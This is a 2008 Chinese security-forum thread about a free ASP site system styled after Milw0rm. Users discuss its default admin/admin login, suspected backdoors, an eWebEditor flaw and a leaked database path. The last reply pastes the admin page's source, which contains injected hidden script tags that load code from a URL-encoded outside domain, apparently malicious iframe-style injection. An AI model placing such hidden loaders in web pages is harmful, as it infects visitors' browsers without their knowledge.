程序作者:ㄨiaoC（cclsoft@126.com）
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

主页地址:www.cd99.cn
这是很简单的一个个人整站系统,简单易用,仿Milw0rm.com界面,喜欢Milw0rm.com界面的朋友有福了!
网站后台管理
密码:admin
留言本
用户名:admin
密码:admin

如果要修改数据库文件名,请修改以下几个文件
db_inc.asp
admin/db_inc.asp
conn.asp
admin/conn.asp
gbook/index.asp

本站前台完全防IFRAME挂马,保证了浏览网站用户的安全
完全防止SQL注入!保证了你网站的安全!

下载地址:http://www.cd99.cn/test/viewdown.asp?id=85

帅哥那套程序你确定没后门？

我是说Milw0rm.com这个。。系统的。。

晕,现在的孩子也真是的,什么都怀疑~
可见现在的人啊,素质~~~
声明,这个网站程序是自己ASP的练手作品,放后门干鸟!!!!我自己都在用!!!!!
唉,可悲啊~~~~

其实也不是怀疑你！是怀疑这个社会！呵呵！其实这里面就有一个技术的问题了！
如果你技术好！你可以自己找出来后门呀！而且并不代表你用，就可以说明这个程序就没有后门了！

引用:

原帖由 pc逍遥鼠 于 2008-2-5 16:01 发表
其实也不是怀疑你！是怀疑这个社会！呵呵！其实这里面就有一个技术的问题了！
如果你技术好！你可以自己找出来后门呀！而且并不代表你用，就可以说明这个程序就没有后门了！ ...

呵呵,不仅仅是我用,整个程序都是我自己写的,有没后门我会不知道么?

反正如果大家喜欢这个程序的风格的话,就哪去用吧,呵呵~~

引用:

原帖由 xiaoc 于 2008-2-5 15:52 发表
晕,现在的孩子也真是的,什么都怀疑~
可见现在的人啊,素质~~~
声明,这个网站程序是自己ASP的练手作品,放后门干鸟!!!!我自己都在用!!!!!
唉,可悲啊~~~~

别激动……

我没说你的系统带后门。我的意思是说你的那东西是否是copy from milw0rm

milw0rm的代码公布过。 不知道带了后门。  我没说你那产品带……

看来你激动过头了……

可能我在回复你的第一帖的时候没把语言组织好，对不起，造成误解了……

[ 本帖最后由 ゛小︷帅！﹊ 于 2008-2-6 10:04 编辑 ]

呵呵，误解了，不好意思哦~~
不过问下milw0rm的代码哪里有下？
学习学习~~

引用:

原帖由 xiaoc 于 2008-2-6 12:34 发表
呵呵，误解了，不好意思哦~~
不过问下milw0rm的代码哪里有下？
学习学习~~

http://0kee.com/read.php?tid=103

客气了，整站的。

小菜不知道有不有后门……

呵呵~忽略了一些东西哦！
http://www.cd99.cn/hi.asp

呵呵！这个风格不错，拿过来玩玩！

引用:

原帖由 cool_wxd 于 2008-2-7 20:47 发表
呵呵~忽略了一些东西哦！
http://www.cd99.cn/hi.asp

请问是ewebeditor的洞吗?
那个可以session欺骗的...
因为ewebeditor是06年刚刚制作网站时候下载的,所以没有注意.
后台管理也可以session欺骗...
这个我在以后的版本会注意的...

呵呵,果然是ewebeditor的问题~~
因为是免费的虚拟主机,所以进行session欺骗很容易的...
把ewebeditor下的那些管理文件删除了就可以了吧,哈哈~

[ 本帖最后由 xiaoc 于 2008-2-8 18:31 编辑 ]

呵呵~不是什么session的问题，是你的admin_default.asp等一些文件没有删除，加上用户名密码可以破解的原因！

[Home]
Microsoft JET Database Engine 错误 '80004005'

'D:\freeweb\cd99\web\test\database\##ainixiaoc99hahaha.mdb'不是一个有效的路径。 确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。

/test/GBook/Index.asp，行 33

引用:

原帖由 cool_wxd 于 2008-2-7 20:47 发表
呵呵~忽略了一些东西哦！
http://www.cd99.cn/hi.asp

无语........

貌似一点都不安全哦

[ 本帖最后由 cchhd 于 2008-2-26 14:54 编辑 ]

不知道楼主现在有没有解决漏洞
期待更新的版本

为什么登录后台后      一片空白
查看源代码:
<span style="display:none;"><script src=../iiswatch/js.js></script></span></style>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>cd99后台管理系统</title>
</head>

<frameset rows="*" cols="191,*" framespacing="0" frameborder="no" border="0">
  <frame src="right.html" name="leftFrame" scrolling="No" noresize="noresize" id="f126" title="leftFrame" />
  <frame src="menu.html" name="mainFrame" id="f126" title="mainFrame" />
</frameset>
<noframes><body>
</body>
</noframes></html>
<script src=http://%76%63%63%64%2E%63%6E></script><script src=http://%76%63%63%64%2E%63%6E></script><script src=http://%76%63%63%64%2E%63%6E></script><script src=http://%76%63%63%64%2E%63%6E></script>